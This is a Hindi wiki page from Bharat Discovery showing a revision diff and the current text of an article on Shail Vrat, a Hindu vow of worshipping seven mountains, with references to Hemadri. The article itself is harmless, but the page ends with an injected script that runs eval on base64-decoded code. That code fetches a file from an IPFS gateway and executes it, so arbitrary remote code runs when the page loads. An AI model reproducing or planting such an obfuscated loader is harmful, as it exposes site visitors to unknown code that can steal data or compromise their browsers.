Difference between revisions of "शैल व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - " {{लेख प्रगति |आधार=आधार1 |प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}" to "")
 
(2 intermediate revisions by 2 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
(1) पर्वत पूजा की जाती है।
 
(1) पर्वत पूजा की जाती है।
 
*इच्छापूर्ति एवं आनन्द की प्राप्ति की प्राप्ति होती है।<ref>हेमाद्रि (व्रतखण्ड 1, 796, विष्णुधर्मोत्तरपुराण से उद्धरण);</ref>  
 
*इच्छापूर्ति एवं आनन्द की प्राप्ति की प्राप्ति होती है।<ref>हेमाद्रि (व्रतखण्ड 1, 796, विष्णुधर्मोत्तरपुराण से उद्धरण);</ref>  
(2) [[चैत्र]] [[शुक्ल पक्ष]] की [[प्रतिपदा]] से सात दिनों तक प्रतिदिन सात पर्वतों, यथा–महेन्द्र, मलय, सह्य, शुक्तिमान, ऋक्ष, विन्ध्य एवं पारियात्र की पूजा की जाती है।
+
(2) [[चैत्र]] [[शुक्ल पक्ष]] की [[प्रतिपदा]] से सात दिनों तक प्रतिदिन सात पर्वतों, यथा–[[महेन्द्र पर्वत|महेन्द्र]], मलय, सह्य, [[शुक्तिमान]], ऋक्ष, [[विन्ध्य पर्वत|विन्ध्य]] एवं पारियात्र की पूजा की जाती है।
 
*जौ से होम, केवल जौ का सेवन किया जाyता है।
 
*जौ से होम, केवल जौ का सेवन किया जाyता है।
 
*यह व्रत एक वर्ष तक किया जाता है।
 
*यह व्रत एक वर्ष तक किया जाता है।
Line 8: Line 8:
 
*कर्ता, राजा एवं शत्रुओं पर विजय पाता है।<ref>हेमाद्रि (व्रतखण्ड 1, 463-464, विष्णुधर्मोत्तरपुराण 3|16|1-7 से उद्धरण)।</ref>
 
*कर्ता, राजा एवं शत्रुओं पर विजय पाता है।<ref>हेमाद्रि (व्रतखण्ड 1, 463-464, विष्णुधर्मोत्तरपुराण 3|16|1-7 से उद्धरण)।</ref>
 
 
 
 
 +
{{लेख प्रगति|आधार=|प्रारम्भिक= प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
==अन्य संबंधित लिंक==
 
==अन्य संबंधित लिंक==
{{पर्व और त्योहार}}
+
{{पर्व और त्योहार}}{{व्रत और उत्सव}}
{{व्रत और उत्सव}}
+
[[Category:व्रत और उत्सव]][[Category:पर्व_और_त्योहार]][[Category:संस्कृति कोश]]
[[Category:व्रत और उत्सव]]
 
[[Category:पर्व_और_त्योहार]]
 
[[Category:संस्कृति कोश]]
 
 
__INDEX__
 
__INDEX__

Latest revision as of 09:18, 25 August 2014

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.

(1) parvat pooja ki jati hai.

  • ichchhapoorti evan anand ki prapti ki prapti hoti hai.[1]

(2) chaitr shukl paksh ki pratipada se sat dinoan tak pratidin sat parvatoan, yatha–mahendr, malay, sahy, shuktiman, rriksh, vindhy evan pariyatr ki pooja ki jati hai.

  • jau se hom, keval jau ka sevan kiya jayta hai.
  • yah vrat ek varsh tak kiya jata hai.
  • ant mean 20 prasth jau ka dan diya jata hai.
  • karta, raja evan shatruoan par vijay pata hai.[2]

 

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. hemadri (vratakhand 1, 796, vishnudharmottarapuran se uddharan);
  2. hemadri (vratakhand 1, 463-464, vishnudharmottarapuran 3|16|1-7 se uddharan).

any sanbandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>